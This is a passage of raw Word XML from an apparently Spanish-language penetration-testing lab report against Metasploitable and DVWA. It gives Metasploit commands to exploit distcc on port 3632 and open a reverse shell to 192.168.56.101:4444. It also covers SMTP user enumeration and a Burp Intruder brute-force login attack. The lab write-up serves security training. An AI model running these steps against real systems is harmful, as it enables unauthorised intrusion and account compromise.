          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0C85CA38" wp14:editId="1AEBDEC4">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14:paraId="5C85F341" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Elegimos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> para lanzar el ataque con el comando “use 0”, el 0 es porque es el número del </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, si fuera cualquier otro número pues elegiríamos el que corresponda:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D1F47C" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="004F30AA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03AB909A" wp14:editId="08F88BD9">
            <wp:extent cx="5612130" cy="3158490"/>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8490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="269CF3CB" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E4175CE" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="004F30AA" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Buscamos los </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> precargados en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> con el comando “show </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” y elegimos el que mejor nos parezca para comenzar a intentar la explotación de la </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>maquina en este caso elegimos el número 6 que parece que tiene buena pinta</w:t>
      </w:r>
      <w:r w:rsidR="0003649B">
        <w:t xml:space="preserve"> con el comando </w:t>
      </w:r>
      <w:r w:rsidR="003D61BE">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="0003649B">
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0003649B">
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0003649B">
        <w:t xml:space="preserve"> 6</w:t>
      </w:r>
      <w:r w:rsidR="003D61BE">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60514F7A" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="0003649B" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="0003649B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="67D717A5" wp14:editId="37EA35C6">
            <wp:extent cx="5612130" cy="314960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49600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A62EE0A" w14:textId="77777777" w:rsidR="0003649B" w:rsidRDefault="0003649B" w:rsidP="004F30AA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3052ACA2" w14:textId="77777777" w:rsidR="0003649B" w:rsidRDefault="0003649B" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Establecemos la dirección IP de la maquina a atacar con el comando “set RHOSTS 192.168.56.102”, establecemos también el puerto con el comando “set RPORT 3632” así como la configuración de la maquina en la que se va a ejecutar nuestra Shell reversa con los comandos “set LHOST 192.168.56.101” y “set LPORT 4444”:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB582C3" w14:textId="77777777" w:rsidR="0003649B" w:rsidRDefault="0003649B" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="0003649B">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B2FB85" wp14:editId="15325666">
            <wp:extent cx="5612130" cy="3165475"/>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65475"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="446670B8" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="0003649B" w:rsidP="009331C2">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00817962">
        <w:t xml:space="preserve">Ejecutamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00817962">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00817962">
        <w:t xml:space="preserve"> con el comando “run” y vemos que tenemos acceso a la maquina a través de la vulnerabilidad explotada:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28FF22AE" w14:textId="77777777" w:rsidR="00817962" w:rsidRDefault="00817962" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00817962">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A67EA59" wp14:editId="1AEF6104">
            <wp:extent cx="5612130" cy="3134995"/>
            <wp:effectExtent l="0" t="0" r="762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34995"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE22CE6" w14:textId="77777777" w:rsidR="00817962" w:rsidRDefault="00817962" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00817962">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4F960151" wp14:editId="5D3DE750">
            <wp:extent cx="5612130" cy="3139440"/>
            <wp:effectExtent l="0" t="0" r="762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39440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E15C88" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A7933D" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C87017" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3880EF88" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="457211B1" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00817962">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441D929C" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Explotación automática con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> de la vulnerabilidad de enumeración de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>smtp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3D8E464F" w14:textId="77777777" w:rsidR="004F30AA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Encontramos la vulnerabilidad con nmap y buscamos en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> si existe el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="162C2429" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00C741CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48BD67FA" wp14:editId="2D87F5B3">
            <wp:extent cx="5612130" cy="30118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11805"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3673FC1B" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez que la identificamos, seleccionamos con el comando “use 0” para seleccionar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1A9B6F07" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00C741CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="254ABCB6" wp14:editId="0D1B9C77">
            <wp:extent cx="5612130" cy="313817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38170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FF2380" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7201DC09" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="006E4A94" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Solo como informativo, en este caso encontraremos muchos “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” el objetivo del ataque es, en esencia descubrir nombres de usuarios, cuentas de correos, etc. Si bien es más enfocado a la recuperación de la información, resulta útil porque podemos potencialmente podemos reconocer cuentas de usuario con contraseñas para ingresar al sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C632CBF" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="00C741CA" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00C741CA">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3F365242" wp14:editId="01AC2D74">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5315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B86F62" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2595CDD5" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F0625F0" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29EA65EB" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2054BA6B" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D8070BD" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7371E2A4" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7310A1A4" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6015F85A" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45E58490" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="111B696C" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63A8174B" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="429287E4" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0A740209" w14:textId="77777777" w:rsidR="00ED3E68" w:rsidRDefault="00ED3E68" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F7EBC55" w14:textId="77777777" w:rsidR="00C741CA" w:rsidRDefault="006E4A94" w:rsidP="00C741CA">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Primero limitamos el ataque a la maquina vulnerable con el comando “set RHOSTS 192.168.56.102”, inmediatamente después lanzamos el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, aquí no elegimos un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> sino que se lanzan todos porque lo que se busca es enumerar </w:t>
      </w:r>
      <w:r w:rsidR="00ED3E68">
        <w:t>los usuarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0BD109" w14:textId="77777777" w:rsidR="006E4A94" w:rsidRDefault="006E4A94" w:rsidP="006E4A94">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="006E4A94">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-MX"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21FE7409" wp14:editId="740AD372">
            <wp:extent cx="5612130" cy="315849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8490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5F1D09" w14:textId="77777777" w:rsidR="00FB576D" w:rsidRDefault="00FB576D" w:rsidP="00FB576D">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t>Análisis de vulnerabilidades WEB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E9C925" w14:textId="77777777" w:rsidR="00CD60DB" w:rsidRDefault="00CD60DB" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En el caso del análisis de vulnerabilidades web estas se harán a la DVWA para lo cual ingresaremos la dirección IP de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Metasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> en </w:t>
      </w:r>
      <w:r w:rsidR="00D8019E">
        <w:t>nuestro navegador web, d</w:t>
      </w:r>
      <w:r>
        <w:t>espués comenzaremos a elegir cada 1 de los módulos utilizarem</w:t>
      </w:r>
      <w:r w:rsidR="00D8019E">
        <w:t>os burp suite:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED67957" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00D8019E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251666432" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="39B650BE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>167640</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3175635"/>
            <wp:effectExtent l="0" t="0" r="762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75635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F9E3D5" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61A64B6D" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A887C3" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336D24A6" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D23C1DA" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FD0C852" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A1E301" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488E88CF" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F23592C" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A20BD02" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44FFCF44" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24BF3FDE" w14:textId="77777777" w:rsidR="00D8019E" w:rsidRDefault="00D8019E" w:rsidP="00D8019E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Intentamos hacer login con un nombre de usuario y contraseña e interceptamos la petición para analizarla y lanzar sobre ella un ataque de fuerza bruta para usuario y contraseña utilizando la herramienta </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>intruder</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5801EB28" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
      <w:r w:rsidRPr="00ED5A6E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="224449D7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>211455</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>8255</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5612130" cy="3028315"/>
            <wp:effectExtent l="0" t="0" r="7620" b="63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28315"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA7509F" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19CCBD9A" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E928E9E" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37761CCA" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="493B3F9C" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01040F6E" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D09494" w14:textId="77777777" w:rsidR="00B35D3E" w:rsidRDefault="00B35D3E" w:rsidP="00B35D3E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
      </w:pPr>
    </w:p>
